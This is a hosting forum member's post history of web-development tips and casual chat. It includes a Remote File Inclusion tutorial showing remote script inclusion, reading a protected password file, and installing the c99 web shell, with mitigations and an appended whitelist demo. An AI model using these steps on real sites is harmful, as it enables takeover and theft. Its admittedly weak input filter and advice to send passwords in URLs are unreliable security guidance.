xisto Community

Everything posted by shadowx

  1. Let me just confirm what I think you want: You want a website to display information, and in the future you would like to have a database on this website? If so, Trap 17 is fine for that sort of thing. Databases are installed automatically. You will need to learn a language like PHP in order to use the databases but no installation is required. If you want a different host with database support just look for a host that lists PHP and MySQL. With Trap 17 you get two tools to use databases: one to set up a new database and another, phpMyAdmin, to insert/remove data from the databases. You will need to learn PHP or similar so you can program code to insert, select, remove, edit data in the database, like when a user signs up or logs in you use PHP to check the database etc...
  2. The link from evolke is the one to follow if you are just signing up and are already hosted (like you are). For new members who have just been approved, read this post. (I'm putting that as I'm sure some newbies will read this topic.) For the time being your hosting is (as far as I'm aware) still working on credits. Opaque will give us the heads up when it's time to switch over, at which point we will all have to "buy" the hosting with MyCent, but we will be told when to do that. So for now all you have to do is sign up at the billing page with the SAME email address that you currently have listed in your profile. In 4-5 hours the script will refresh everything and update it all and your accounts will be linked. Under your avatar, above MyCent, you will see "earned so far" and a number in green. This is your xisto balance and can be checked at any time by logging in at the xisto page. That's all you have to do for now until we are told otherwise.
  3. Interesting... the graph seems to promise good things but can we really expect these results in real life? I mean sure, nice neat, light, effective JS code might be very easy to parse on the new engine and hence increase speeds, but not much JS code is that clean and nice so there could be some bugs there... JS as a language is platform independent as it's run by the browser methinks... however virtually every browser uses a different JS engine and so you never quite know the outcome exactly, as even a tiny difference can stop an effect working or something. And I also agree that FF3 is heavy, not as heavy as IE but damn Mozilla is putting on a few pounds! Hopefully their next release is lighter and faster still.
  4. What you need is to tell the server to parse HTML pages as PHP pages. Add this code:

          AddType application/x-httpd-php .html

      (remember to change .html to .htm if that's the extension you use) to a file named .htaccess (no filename, simply the extension .htaccess). If on Windows, name the file something.htaccess and then rename it manually to remove the part before the dot, as Windows is a fussy character... Then just upload the file to your root directory on your server and that should help. (That's also how they create dynamic images like site.com/image.png?name=shadowx but they use .png instead of .html)
  5. I would say you should go to a dentist, it could be an infection or gum disease which needs to be identified by the dentist. It won't be painful, he will probably just take a look and maybe a swab to send off for testing. Is it possible to scrape off the black stuff? Or is it like a stain on your teeth that you can't remove?
  6. Just use the same email address as your forum email and in a few hours they will be linked and then it's all done :) You must use the same email there as the email you used to register here.
  7. Damn you SM! I was going to wait a few days so I didn't spoil it! I saw it last night too, I got home about 15 minutes after you said you were leaving in the shoutbox. I am a HUGE Saw fan and I think Jigsaw is one of the best characters there are. This film highlights a few things. Jigsaw NEVER killed anyone, they killed themselves or chose death as preferable to pain. It also highlights (extremely well in the last scene) that you should always abide by the rules of the game! And you should always trust Jigsaw. This was what let the film down. Saw 3/4 were the pinnacle of the series, Saw 5 was on level with Saw 2, especially given it was a big game with a similar format to Saw 2, complete one task, move on etc.... The thing that let it down was that the traps, with the exception of the last trap, weren't very Jigsaw-like... they didn't really involve high levels of pain, sacrifice etc... instead they focussed on the mind of the players, not the body. I'll try not to spoil it..... but the following HIDE section IS a spoiler! For example the trap with the sewers as safe chambers and the jars with keys hanging above. This game has nothing to do with the body of the "contestants", instead it is about how they think. In the first room the tape instructed them NOT to follow their instincts, their instincts of course being "every man for himself", however it becomes extremely apparent in the last game how wrong they were to kill their friends: if all had reached that room it would have been a lot quicker to fill the jar and all would have survived. As it is we do not yet know what happens to the two fools. It really does focus on how the detectives involved got involved, what they feel about Jigsaw etc.... which is important but slightly dull. Overall I give the film 4/5, all the other films get 5/5. I can't wait for Saw 6 now!!
  8. unlink("users/nabb"); Muahahaha Consider the nabb group deleted! We are unstoppable, untraceable and most of all we all have a delete button
  9. Yeh the text is a bit unclear, but I don't know how to solve that... I was going to overlay the text in a darker colour over the top of the distorted bump map but I couldn't remember what font I used :) The text says "SHADOWX @ T17". It's meant to be distorted but I think it's a bit too far... no doubt I'll fiddle with it tomorrow anyway (it's 1:24am now!)
  10. Ok girls and boys! I've just been to see Saw five and before I went, because I'm such a fan (It's GENIUS! and John is the GOOD guy! he never killed anyone, they killed themselves!) I made the sig that's in my forum sig right now! Perma link to my sig image: It started off with this one: (notice there are no scanlines in the border?) I then added the scanlines as in the first image. And then in this last image I added some surgical tools (they are in the other two as well but hidden behind other layers, so I brought them forward...) Now I'm no graphic artist! In fact this is my best graphical work and I really like it! I really like the images I used, I had to increase the contrast on the background layer(s) so that the contrast between the central panel and the background is better. And I like that! I also LOVE the text which is home grown using a tut on how to make golden text and then a shift effect (in GIMP) to give the distorted effect as in the Saw 5 trailers (slightly anyway). The only thing is, it needs MORE! to fill that huge space in the panel above-right of the "shadowx @ t17" text. What I really want is "I want to play a game... Do you trust me?" I'm not sure of the font etc... to use though! If anyone has any suggestions feel free to just copy my sig image and work on that or give me a few hints about what to do next. Also can anyone tell me how to use the show/hide tags? I want to hide the coding group names to make my sig less bulky but I've never got on with the show/hide stuff! Any criticism welcome
  11. Ah okies, I'm in communications with Xisto - Support now anyway and they are talking with Opaque to get it all resolved and hopefully preventing it happening again in the future to other people. I've got nearly $5 now, I can show off!
  12. In my continuing attempts to learn more about website security I am going to tell you about a classic attack called Remote File Inclusion (RFI). RFI is exactly what it says really: it involves using (or including) code from one website on another website. So if I have a website, secure.com, with a modular, dynamic system like:

          secure.com/index.php?module=home

      notice the GET variable on the end of the URL. If I enter "blah" instead of "home" I get either a blank page or a 404: page not found error. There is also a chance you will get an error message like:

          Error: include(blah) file not found to includer on line 44

      or similar error messages. So what does this mean? Well, you can see that the file index.php takes the value of "module", adds a file extension to it, and then tries to use include(); on that file name. We can assume the code looks like this:

          $page = $_GET['module'];
          $extension = ".php";
          $file = "$page$extension"; //so we get page.php
          include($file);

      We can check what extension is being used by finding one of the files. For example secure.com/index.php?module=login: if we now explore the site looking for login.htm, login.php etc.... we should eventually find the page login.php (all other extensions will result in a 404 error). So now we know the following: the site takes the GET variable, adds ".php", then uses include() to get the contents of that file into the page index.php. Bad times! That means any file that we put after module= will be included and all the PHP code will be dumped into index.php.

      So how do we make an RFI attack? Firstly you will need a website and a little PHP knowledge. You could make a test script like:

          <?php echo "testing...."; ?>

      save it to your server as test.php and include it in the secure site like this:

          secure.com/index.php?module=http://forums.xisto.com/no_longer_exists/

      Now this is where we sort the men from the boys as it were.... There are two settings in PHP that control the opening of remote files on different servers.
      One works for FOPEN, FWRITE etc... and one works for include() and require(). The line I am talking about is: allow_url_include (I think it's written like that). If this is set to False our secure.com website is fairly secure and our RFI won't work because PHP isn't allowed to load files from other servers. We could then use another exploit: for example, if we knew the passwords were stored in a protected directory like protected/passwords.txt and we didn't have access to this directory because it asked us to log in (using htaccess), we could use the index.php to bypass this with:

          secure.com/index.php?module=protected/passwords.txt

      If the secure site has code that automatically adds .php or another extension on to the GET variable (like in my example where we have $page$extension (something.php)) you will need to add a ? after the passwords.txt -> passwords.txt? otherwise the automatic addition of .php will turn your file into passwords.txt.php which doesn't exist! And we would be shown all the passwords, however not so many sites use this method! Some do though! Anyway.....

      If the secure.com server has allow_url_include set to true our attack should work and we should see testing..... from our echo statement. Good times! Now we know that works we can do ANYTHING! If you want to be able to upload files simply write a self-contained upload script in PHP and include it like:

          secure.com/index.php?module=http://forums.xisto.com/no_longer_exists/

      then on secure.com you will be shown an upload box where you can upload any PHP, HTML, EXE, etc... files you want. Doing this you can build yourself a nice control panel using PHP where you can delete, edit and upload files to their server. You now have complete control! Another option is to use a ready-made control panel type system.
      The one I was introduced to is called c99.txt (DO NOT INCLUDE THIS FILE ON ANY SERVER). A "safe" version would simply give you a nice interface on the secure.com site where you can edit any files you wish etc.... similar to file manager on cPanel with a few extra features. Essentially you would have complete control just by writing:

          secure.com/index.php?module=http://forums.xisto.com/no_longer_exists/?

      (remember the question mark!) Its file extension is confusing, it is actually a PHP file saved as .txt (I'm not sure why it's saved as .txt but it is!) and the PHP inside builds you a control panel, effectively it installs a control panel on the target site. There are other systems you can use but c99.txt is the only one I know. So you can see, from a simple RFI exploit any attacker can gain complete control of your site with the same level of access as you have, scary!

      How do you stop this happening? Well if you have the ability to edit the php.ini file you can set allow_url_fopen to FALSE and allow_url_include to FALSE. Also, the method I prefer: use something like:

          <?php
          $page = $_GET['module'];
          switch ($page) {
              case "blog":
                  include("blog.php");
                  break;
              case "contact":
                  include("contact.php");
                  break;
              case "gallery":
                  include("gallery.php");
                  break;
              default: //A page wasn't chosen, or one that wasn't "home" or "gallery"
                  include("home.php");
                  break;
          }
          ?>

      So if I enter http://forums.xisto.com/no_longer_exists/ the PHP looks in the SWITCH statement for: case"http://forums.xisto.com/no_longer_exists/; doesn't find it so uses the DEFAULT value and shows me home.php. Not much I can do now. Another option is to clean all user input (you should do that anyway!) to remove http:// ../ (go up one directory) and all slashes / \ (to prevent things like folder/file.php):

          $page = $_GET['module'];
          $page = str_replace("http://", "", $page);
          $page = str_replace("/", "", $page);
          $page = str_replace("\\", "", $page);
          $page = str_replace("../", "", $page);
          $page = str_replace("..", "", $page);

      And so on...
      (Note that code WON'T protect you against all RFI attacks. In order to protect yourself you must first learn how to harm yourself, which is what I am doing.) You can also use an IF statement with instr("http://forums.xisto.com/;, $page) etc... and if it returns TRUE then it was an attack, so log it and reject them.

      That's the basics anyway. There are many different ways to execute an RFI attack and every single successful attack is deadly! It could be to upload a new index.php file and overwrite your current one to "deface" your website (eg by having an index page that just says "Joo were H$X0R£D by |\/|£") or by uploading a deadly virus that would make your host very, very upset.... If you want to learn more just google "prevent RFI". I have focussed on PHP because it's the only server-side language I know well! But RFI attacks will work on ANY language that uses a function similar to PHP's include() or require().

      Disclaimer: NEVER attempt these attacks on ANY server unless you have EXPLICIT and WRITTEN permission to do so. If you do not have written permission you can be taken to court, SUED or even put in prison! (for offences such as unauthorized access to computer systems, willing, unauthorized destruction of data etc.....) If you wish to find a safe environment to learn more, create your own server or find a server where you have written permission to learn and test yourself (PM me and I will give the URLs to some sites where you are encouraged to learn in a safe, secure and legal environment). The code I have written may or may not work. I make no assurances that by using my code you will be protected. My code has some severe holes in it!! Do not use my code thinking you are safe because that would be foolish. In order to protect yourself fully you must first learn yourself how to accomplish an attack and how to defend an attack. I may write another tutorial on XSS soon too....
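
The whitelist approach from the post above, as an added example that is not part of the original post or shadowx's code: the request value is used only as a lookup key into a fixed map, so a URL or a path such as protected/passwords.txt never reaches include(), and rejected values are collected for logging. MODULES, resolve_module() and the temporary demo directory are hypothetical names, and the sample inputs are constructed.

```php
<?php
declare(strict_types=1);

// Fixed map from public module name to a file the site owner wrote.
// The request value is only ever a key into this map, never part of a path.
// (Hypothetical names; the file names follow the switch statement in the post.)
const MODULES = [
    'home'    => 'home.php',
    'blog'    => 'blog.php',
    'contact' => 'contact.php',
    'gallery' => 'gallery.php',
];

/**
 * Return the absolute path of the file to include for a requested module.
 * Anything not in MODULES falls back to home.php and is recorded in $rejected.
 */
function resolve_module($requested, string $moduleDir, array &$rejected): string
{
    $base = realpath($moduleDir);
    if ($base === false) {
        throw new RuntimeException("module directory missing: $moduleDir");
    }
    $fallback = $base . DIRECTORY_SEPARATOR . MODULES['home'];

    if ($requested === null || $requested === '') {
        return $fallback; // no module asked for: not an error
    }
    // ?module[]=x arrives as an array, so check the type before using it.
    if (!is_string($requested) || !array_key_exists($requested, MODULES)) {
        $rejected[] = is_string($requested) ? $requested : gettype($requested);
        return $fallback;
    }
    // Second check: the mapped file must exist and sit inside the module
    // directory (catches a symlink or a bad entry added to MODULES later).
    $path = realpath($base . DIRECTORY_SEPARATOR . MODULES[$requested]);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        $rejected[] = $requested;
        return $fallback;
    }
    return $path;
}

// In index.php this would be used as:
//   $rejected = [];
//   include resolve_module($_GET['module'] ?? null, __DIR__ . '/modules', $rejected);
//   foreach ($rejected as $r) { error_log('rejected module: ' . json_encode($r)); }

// --- Demo on constructed input (run from the CLI) ---
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rfi_demo_' . getmypid();
mkdir($dir);
foreach (MODULES as $file) {
    file_put_contents($dir . DIRECTORY_SEPARATOR . $file, "<?php // stub\n");
}

// Constructed samples mirroring the requests discussed in the post.
$samples = [
    'blog',
    'blah',
    'http://attacker.example/test.php',
    'protected/passwords.txt?',
    ['blog'],
    null,
];
$rejected = [];
foreach ($samples as $value) {
    $chosen = basename(resolve_module($value, $dir, $rejected));
    printf("%-40s -> %s\n", json_encode($value, JSON_UNESCAPED_SLASHES), $chosen);
}
echo 'rejected: ', json_encode($rejected, JSON_UNESCAPED_SLASHES), "\n";

// Remove the demo files again.
array_map('unlink', glob($dir . DIRECTORY_SEPARATOR . '*.php'));
rmdir($dir);
```

Setting allow_url_include to Off in php.ini, as the post suggests, remains worthwhile alongside this, since the map only protects the one include() it guards.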
  13. I too dislike the homepage mainly because of the squashed-up feel, however consider resizing your browser to 800x600: that page fits PERFECTLY in that size! And that, presumably, was the intention! If your users turn up with a 600px wide screen and your page is 700px wide you've lost that visitor right there! What I think could be done is a more dynamic page. So on the left you could have "features", "news" etc... all as links, when clicked the central area changes to fit that description. This could be done with JavaScript to prevent the page reloading, or frames (or even a PHP dynamic system). I'm not a designer so my input is limited, but from a coder's point of view I can see so many dynamic things that could be done with that page to give the user only the info they want (plus a little extra but not much) but still keeping access to the huge amount of info there! But at the end of the day Xisto is changing a lot, so perhaps there's something planned! If not then it wouldn't take much to de-clutter the page, perhaps remove the boxes within the centre info panel and add more dynamic, and clear links. It's still not terrible though!
  14. As has been said it's really impossible to do such things. A classic way is to prevent right clicking, but in most cases disabling JavaScript will thwart most scripts as most rely on JS. Also clicking left and right button together fools the system. In general the script looks for the numbers corresponding to a mouse click, something like "1" is left, "2" is right, so if the mouseclick == 2 it was a right click so block it. But if I click both buttons and generate a 3 then the script is useless. Also View>Source. There are I think programs that claim to hide your HTML by somehow encrypting it but telling the browser how to display it or something. I don't know if they actually exist/work but I'm sure I've seen them advertised for high prices. But as Pyost said, for a browser to render a page it needs unrestricted access to the HTML code, and to display the code to the browser is to display it to the user! Of course you could always make your website using Flash or something and then the source is hidden, though there are ways to get fragments back.
  15. Yeh I don't think I've had any updates yet so I'll give it a while and see what happens. Like I said I'm not bothered about it not updating yet, I just want to identify if the cause is a problem or just a laggy script. If it's a problem I've caused then of course I want to resolve it so it isn't a long term thing. If it's just a laggy script then I'm happy to wait for it to wake up. I'll leave it till Monday, about 3 days, and if no updates are forthcoming I'll submit a ticket or something. I noticed Opaque had like a thousand MyCents the other day! Rich man! Think I'm going to start talking to him more often
  16. COD4 is an EXCELLENT game! The missions are very realistic and include things such as: sneaking into enemy bases with a sniper rifle and silenced pistol, gaining access to the top of a tower block and assassinating an enemy. If you miss you then pursue the enemy shooting guys as you go. Escaping from an enemy base in the back of a truck being shot at and shooting back. And even taking control of the guns on a plane shooting at enemies with a huge machine gun or shells. The only thing I would say is the game is quite graphic and in more than one scene you are a dying character, slowly dying on the floor, and at one point seeing a close up of an enemy shooting himself in the head. If your son is young (I'd say below 13/15 years old) you might want to think more before buying this game. It is VERY realistic though and the online play is EXCELLENT! including fishing multiple real enemies in death matches etc... he would love it! (I know I do!) Something to consider is that here in the UK COD5 comes out in just a few weeks. I'm not sure what country you live in but see if you can find out when that game comes out. Apparently you get to drive tanks etc....
  17. Yeh I got it linked to start with, and then I changed my email on the forums, then I remembered and changed it on the billing page too. I just want to make sure I am still linked, I'm not worried about it not updating yet, it just seems everyone else is being updated and mine hasn't
  18. Hello everyone, can anyone confirm for me the time it takes for MyCent to be updated? Is it 4-5 hours? If so I think one of two things has happened: A.) the system has a little bug or B.) my accounts are no longer linked for some reason. I did change my email on the forums and then on the billing page so that could be the cause of the issue. MyCent hasn't been updated for me for about 3 days now (I have just over 300 cents at the time of posting). Can anyone confirm what the issue could be? Or advise me what to do next? (I followed Opaque's instructions to set both emails to the same, new email address and submitted a support ticket to confirm I have changed both my emails and notify the admins of this (no reply on that yet).)
  19. The problem is you have a URL as the link HREF value, eg: <a href=#> and then some JS code to handle the onclick event. Change the links to:

          <a href="" onclick="MM_openBrWindow('17.10.08_show_me_more.html','','scrollbars=yes,resizable=yes,width=700,height=700')">SHOW ME MORE</a>

      and that should work hopefully (remove the hash # from the HREF section)
  20. Have you installed the modem? If it's a USB device it will need to be installed by using the disk you got with the device (or google the make and model of the device with the word "drivers" and you will find a driver download). Once installed it should show up. If it is an RJ45 or an ethernet modem/device check that the network card on the old laptop actually works. Try connecting it to the new laptop (using a crossover cable) and check for connectivity (or if you have some other network device like a hub or something try that). The goal is to make sure the network card works. If it DOES work then the problem lies either with the modem or the cable used to connect it (probably). If the card DOESN'T work (IE no network connection to ANY device) then the problem is obviously the network card.
  21. Glad to see you've solved the issue. I have a little info that might help understand why you get the error message and why it doesn't always matter! Basically as said PMA (phpMyAdmin) notices that you have a root account with FULL privileges and NO password, meaning if your server was online any attacker could very easily delete your databases, edit them etc.... because there is no password and the account has full privileges. For testing on a local server I wouldn't worry too much, just make sure you use a good firewall (you should anyway really!) to stop people gaining access to your DBs or your system. If you want to use another account on PMA just go to privileges (on the main page) and "add new user", from there just type in the new username and password. You can also then select the privileges of that user. For example you might have a PHP script where you want to ONLY select data from a DB (perhaps for a login or something) so you can have a restricted user that only has SELECT privileges, so even if an attacker used SQL injections they would never be able to delete or edit your databases because that user cannot do anything except read the databases. I don't know if that made sense or not but I hope it did! It also helps to create users that are the same as the ones on your real host so that when error-checking or editing scripts you don't have to worry about changing the username/password in the script
  22. Hum I see... Well I know you can use SQL queries in VB, and you can also connect to remote servers (and presumably databases) with a winsock command/element (I think, it's been a long time since I used VB and I didn't get along with it). So if you connect to the server using winsock (or the equivalent to open a connection to a remote server) and then use that connection as a link to the database (in the database connection code use the winsock link as the address) and use the SQL port (3306 on my local test server config thingy) you could in theory connect to the DB, then you can just do what you need to do by querying the database looking for the current user, if they don't exist then make a new record for them (this could be pretty complex as you may have to add details to more than one database and you may also need to encrypt data to make it work) and that would sign them up to the forum. The problem with this is that most hosts (I would expect) would not allow remote connections to the database for security reasons so you might have trouble with that. Another option could be to load a small PHP file within a hidden browser like: check.php?username=SOME_USER and in that PHP file do things like check in the DB for the username, if it doesn't exist then create it for them. Less complex that way I think (unless you don't know PHP) and less issues to overcome as you won't have to get through security gates to access the database and it would be easier to pass variables too. It would still require input like password, email address, real name etc... etc.... but you could use GET variables like: check.php?username=bob&password=bobpass&email=bob@bob.com etc.... etc..... Make much sense? Probably not as it's 00:31PM and I got up at 9am : /
  23. I expect willielwgg's reply says it all, though to be honest xisto could make a killing by letting you deposit to PayPal and taking a 30% or 50% cut.... so if I transferred $10 I would get $5, as I expect xisto gets cash from the mere fact of me posting on this forum (they have to make money somehow).... Tis a shame!
  24. This is an interesting idea... I have around 300 credits so can spend 260 and have enough left to keep me going.... Admins: Can you confirm/deny that if I use credits to get a free domain it will/won't be kept active when credits disappear? (And am I able to register a new domain name when it expires in a year or am I tied to that domain name forever?)
  25. I'm not so good with HTTP headers myself as it goes! It was really just a sort of suggestion of steps to take. This link http://www.livejournal.com/doc/fotobilder-api will show some examples of HTTP headers with and without variables. Well PHP uses two main types of variables, POST and GET. GET variables are sent in the URL like you said up there ^^^ POST variables are sent via HTTP requests. If you can somehow set up the signup.php page to accept GET variables instead (that could be a fair amount of work!) then you could use a URL like you posted. Otherwise you might not be able to do this. It IS possible to use PHP to set HTTP headers and set POST variables within these headers using a library called cURL (or CURL) (google it). I never had much luck with it though, I found it quite complex and not all webhosts have it enabled for security reasons methinks. The last remaining option is to pay someone to modify all the forums you are planning to use to connect to one database (or create a PHP page to sign the user up on all the forums for you) but that could cost a hundred pounds or more. What exactly is the situation? Your clan uses a program for communication etc...? (Did you write this app?) And you also have a forum? (Just the one or more than one?) And you want it so any user who registers on the communication program is automatically registered on the forum(s)? If so there might be a solution involving JavaScript.... I'm not 100% though, it might not work (plus I'm not a JS expert so I can only lay the foundations)